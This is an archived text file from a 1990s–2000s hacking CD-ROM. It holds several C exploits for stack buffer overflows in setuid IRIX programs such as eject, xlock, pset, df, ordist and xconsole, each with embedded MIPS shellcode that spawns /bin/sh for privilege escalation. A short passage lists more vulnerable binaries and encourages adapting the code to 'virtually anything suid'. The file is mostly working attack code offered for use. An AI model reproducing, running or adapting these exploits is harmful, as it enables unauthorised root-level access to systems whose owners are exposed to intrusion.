Power Hacker 2003

home *** CD-ROM | disk | FTP | other *** search

/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / irix-buffer.txt < prev next >

Wrap

Text File | 2001-11-06 | 12.9 KB | 479 lines

--------------------------------------------------------------------------------- /* copyright by */ /* Last Stage of Delirium, Dec 1996, Poland*/ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define BUFSIZE 2068 #define OFFS 800 #define ADDRS 3 #define ALIGN 0 #define ALIGN2 4 char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c"; char nop[]="\x24\x0f\x12\x34"; void run(unsigned char *buf) { execl("/usr/sbin/eject","lsd",buf,NULL); printf("execl failed\n"); } char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34"; main(int argc, char *argv[]) { char *buf, *ptr, addr[8]; int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN; int i, noplen=strlen(nop); if (argc >1) bufsize=atoi(argv[1]); if (argc >2) offs=atoi(argv[2]); if (argc >3) addrs=atoi(argv[3]); if (argc >4) align=atoi(argv[4]); if (bufsize<strlen(asmcode)) { printf("bufsize too small, code is %d bytes long\n", strlen(asmcode)); exit(1); } if ((buf=malloc(bufsize+(ADDRS<<2)+noplen+1))==NULL) { printf("Can't malloc\n"); exit(1); } *(int *)addr=(*(unsigned long(*)())jump)()+offs; printf("address=%p\n",*(int *)addr); strcpy(buf,nop); ptr=buf+noplen; buf+=4-align; for(i=0;i<bufsize;i++) *ptr++=nop[i%noplen]; memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode)); for(i=0;i<(addrs<<2);i++) *ptr++=addr[i%sizeof(int)]; *ptr=0; printf("buflen=%d\n", strlen(buf)); fflush(stdout); ptr-=addrs<<2; *(int *)addr+=(0x7fff350c-0x7fff31e8)+(4*100)+ALIGN2; for(i=0;i<64;i++) *ptr++=addr[i&3]; /* gp value is set here */ ptr=buf+ALIGN+(0x7fff2f00-0x7fff2ce8)-24; *(int *)addr=(*(unsigned long(*)())jump)()+OFFS+(0x7fff350c-0x7fff31e8-4)+ALIGN2+32+32412; for(i=0;i<64;i++) *ptr++=addr[i&3]; run(buf); } ------------------------------------------------------------------------------------ /* copyright by */ /* Last Stage of Delirium, Dec 1996, Poland*/ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define BUFSIZE 2072 #define OFFS (800+512+128) #define ADDRS 0x100 #define ALIGN 2 char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c"; char nop[]="\x24\x0f\x12\x34"; void run(unsigned char *buf) { execl("/usr/bin/X11/xlock","lsd","-name",buf,NULL); printf("execl failed\n"); } char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34"; main(int argc, char *argv[]) { char *buf, *ptr, addr[8]; int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN; int i, noplen=strlen(nop); if (argc >1) bufsize=atoi(argv[1]); if (argc >2) offs=atoi(argv[2]); if (argc >3) addrs=atoi(argv[3]); if (argc >4) align=atoi(argv[4]); if (bufsize<strlen(asmcode)) { printf("bufsize too small, code is %d bytes long\n", strlen(asmcode)); exit(1); } if ((buf=malloc(bufsize+(ADDRS<<2)+noplen+1))==NULL) { printf("Can't malloc\n"); exit(1); } *(int *)addr=(*(unsigned long(*)())jump)()+offs; printf("address=%p\n",*(int *)addr); strcpy(buf,nop); ptr=buf+noplen; buf+=4-align; for(i=0;i<bufsize;i++) *ptr++=nop[i%noplen]; memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode)); for(i=0;i<(addrs<<2);i++) *ptr++=addr[i%sizeof(int)]; *ptr=0; printf("buflen=%d\n",strlen(buf)); fflush(stdout); /* gp value is set here */ ptr=buf+ALIGN+(0x7fff22c0-0x7fff1ea0); *(int *)addr=(*(unsigned long(*)())jump)()+OFFS+(0x7fff3828-0x7fff3468)+32476; for(i=0;i<4;i++) *ptr++=addr[i&3]; run(buf); } ------------------------------------------------------------------------------------ /* copyright by */ /* Last Stage of Delirium, Dec 1996, Poland*/ /* This one gives you egid=0(sys) */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define BUFSIZE 4172 #define OFFS 816 #define ADDRS 8 #define ALIGN 3 #define ALIGN2 1 char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c"; /* char nop[]="\x24\x0f\x12\x34"; */ char nop[]="\x01\x20\x48\x25"; void run(unsigned char *buf) { execl("/sbin/pset","lsd","-s","666",buf,NULL); printf("execl failed\n"); } char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34"; /* unsigned long get_sp(void) { __asm__("or $2,$sp,$0"); } */ main(int argc, char *argv[]) { char *buf, *ptr, addr[8]; int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN; int i, noplen=strlen(nop); if (argc >1) bufsize=atoi(argv[1]); if (argc >2) offs=atoi(argv[2]); if (argc >3) addrs=atoi(argv[3]); if (argc >4) align=atoi(argv[4]); if (bufsize<strlen(asmcode)) { printf("bufsize too small, code is %d bytes long\n", strlen(asmcode)); exit(1); } if ((buf=malloc(bufsize+(ADDRS<<2)+noplen+1))==NULL) { printf("Can't malloc\n"); exit(1); } *(int *)addr=(*(unsigned long(*)())jump)()+offs; printf("address=%p\n", *(int *)addr); strcpy(buf,nop); ptr=buf+noplen; buf+=align; for(i=0;i<bufsize;i++) *ptr++=nop[i%noplen]; memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode)); for(i=0;i<ALIGN2;i++) *ptr++=nop[i%noplen]; for(i=0;i<(addrs<<2);i++) *ptr++=addr[i%sizeof(int)]; *ptr=0; printf("buflen=%d\n", strlen(buf)); fflush(stdout); run(buf); } ----- df.c -------------------------------------------------------------------- #include <stdlib.h> #include <fcntl.h> #define BUFSIZE 2061 #define OFFS 800 #define ADDRS 2 #define ALIGN 0 void run(unsigned char *buf) { execl("/usr/sbin/df", "df", buf, NULL); printf("execl failed\n"); } char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c"; char nop[]="\x24\x0f\x12\x34"; unsigned long get_sp(void) { __asm__("or $2,$sp,$0"); } /* this align stuff sux - i do know. */ main(int argc, char *argv[]) { char *buf, *ptr, addr[8]; int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN; int i, noplen=strlen(nop); if (argc >1) bufsize=atoi(argv[1]); if (argc >2) offs=atoi(argv[2]); if (argc >3) addrs=atoi(argv[3]); if (argc >4) align=atoi(argv[4]); if (bufsize<strlen(asmcode)) { printf("bufsize too small, code is %d bytes long\n", strlen(asmcode)); exit(1); } if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) { printf("Can't malloc\n"); exit(1); } *(int *)addr=get_sp()+offs; printf("address - %p\n", *(int *)addr); strcpy(buf, nop); ptr=buf+noplen; buf+=noplen-bufsize % noplen; bufsize-=bufsize % noplen; for (i=0; i<bufsize; i++) *ptr++=nop[i % noplen]; memcpy(ptr-strlen(asmcode), asmcode, strlen(asmcode)); memcpy(ptr, nop, strlen(nop)); ptr+=align; for (i=0; i<addrs<<2; i++) *ptr++=addr[i % sizeof(int)]; *ptr=0; printf("total buf len - %d\n", strlen(buf)); run(buf); } --- end of df.c --------------------------------------------------------------- --- ordist.c ------------------------------------------------------------------ #include <stdlib.h> #include <fcntl.h> #define BUFSIZE 306 #define OFFS 800 #define ADDRS 2 #define ALIGN 2 void run(unsigned char *buf) { execl("/usr/bsd/ordist", "ordist", "-d", buf, "-d", buf, NULL); printf("execl failed\n"); } char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c"; char nop[]="\x24\x0f\x12\x34"; unsigned long get_sp(void) { __asm__("or $2,$sp,$0"); } /* this align stuff sux - i do know. */ main(int argc, char *argv[]) { char *buf, *ptr, addr[8]; int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN; int i, noplen=strlen(nop); if (argc >1) bufsize=atoi(argv[1]); if (argc >2) offs=atoi(argv[2]); if (argc >3) addrs=atoi(argv[3]); if (argc >4) align=atoi(argv[4]); if (bufsize<strlen(asmcode)) { printf("bufsize too small, code is %d bytes long\n", strlen(asmcode)); exit(1); } if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) { printf("Can't malloc\n"); exit(1); } *(int *)addr=get_sp()+offs; printf("address - %p\n", *(int *)addr); strcpy(buf, nop); ptr=buf+noplen; buf+=noplen-bufsize % noplen; bufsize-=bufsize % noplen; for (i=0; i<bufsize; i++) *ptr++=nop[i % noplen]; memcpy(ptr-strlen(asmcode), asmcode, strlen(asmcode)); memcpy(ptr, nop, strlen(nop)); ptr+=align; for (i=0; i<addrs<<2; i++) *ptr++=addr[i % sizeof(int)]; *ptr=0; printf("total buf len - %d\n", strlen(buf)); run(buf); } --- end of ordist.c ----------------------------------------------------------- ================================================================================ The code that follows this text, written by David Hedley, can be used to exploit various other programs just the same. He suggested that they probably use a shared librarry, seems that that may be so. I've been looking through around and trying some things. Here are some more that can be exploited in the same manner: NOTE: This has only been tested on an Indy R4600 IRIX 5.3 /usr/sbin/X11/xconsole /usr/sbin/X11/cdplayer /usr/sbin/xwsh (requires argument of "4") /usr/sbin/monpanel The only thing you'll have to modify in the following code is the PATH and the PATH_PROG variables. I'm sure with bigger modfications of this code you can exploit virtually anything suid. If it doesn't seem to work of gives you a "Bus Error" then try using the "4" argument that Mr Hedley suggested. Reports of any other finds would be appreciated, Thanks ========Cut Here======= /* Exploit by David Hedley <hedley@cs.bris.ac.uk> * 27/5/97 * * _very_ slighty modified by Patrick J..Paulus <pjp@stepahead.net> * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #define NUM_ADDRESSES 500 #define BUF_LENGTH 500 #define EXTRA 9000 #define OFFSET 0x180 /* 0x184 for Irix 6.x */ #define GP_OFFSET -0x80 #define IRIX_NOP 0x03e0f825 /* move $ra,$ra */ #define PATH_PROG "/usr/bin/X11/xconsole" /* path & program name */ #define PROG "xconsole" /* program */ #define u_long unsigned u_long get_sp_code[] = { 0x03a01025, /* move $v0,$sp */ 0x03e00008, /* jr $ra */ 0x00000000, /* nop */ }; u_long irix_shellcode[] = { 0x24041234, /* li $4,0x1234 */ 0x2084edcc, /* sub $4,0x1234 */ 0x0491fffe, /* bgezal $4,pc-4 */ 0x03bd302a, /* sgt $6,$sp,$sp */ 0x03bd202a, /* sgt $4,$sp,$sp */ 0x240203ff, /* li $v0,1023 */ 0x03ffffcc, /* syscall 0xfffff */ 0x23e40138, /* addi $4,$31,264+48 */ 0xa086feff, /* sb $6,-264+7($4) */ 0x2084fef8, /* sub $4,264 */ 0x20850110, /* addi $5,$4,264+8 */ 0xaca4fef8, /* sw $4,-264($5) */ 0xaca6fefc, /* sw $4,-260($5) */ 0x20a5fef8, /* sub $5, 264 */ 0x240203f3, /* li $v0,1011 */ 0x03ffffcc, /* syscall 0xfffff */ 0x2f62696e, /* "/bin" */ 0x2f7368ff, /* "/sh" */ }; char buf[NUM_ADDRESSES+BUF_LENGTH + EXTRA + 8]; void main(int argc, char **argv) { char *env[] = {NULL}; u_long targ_addr, stack, tmp; u_long *long_p; int i, code_length = strlen((char *)irix_shellcode)+1; u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code; stack = get_sp(); if (stack & 0x80000000) { printf("Recompile with the '-32' option\n"); exit(1); } long_p =(u_long *) buf; targ_addr = stack + OFFSET; if (argc > 1) targ_addr += atoi(argv[1]); tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & ~3; while ((tmp & 0xff000000) == 0 || (tmp & 0x00ff0000) == 0 || (tmp & 0x0000ff00) == 0 || (tmp & 0x000000ff) == 0) tmp += 4; for (i = 0; i < NUM_ADDRESSES/(4*sizeof(u_long)); i++) { *long_p++ = tmp; *long_p++ = tmp; *long_p++ = targ_addr; *long_p++ = targ_addr; } for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = IRIX_NOP; for (i = 0; i < code_length/sizeof(u_long); i++) *long_p++ = irix_shellcode[i]; tmp = (targ_addr + GP_OFFSET + NUM_ADDRESSES/2) & ~3; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = (tmp >> 8) | (tmp << 24); *long_p = 0; printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr); execle(PATH_PROG, PROG, "-xrm", &buf[2], 0, env); perror("execl failed"); } ===========================================================================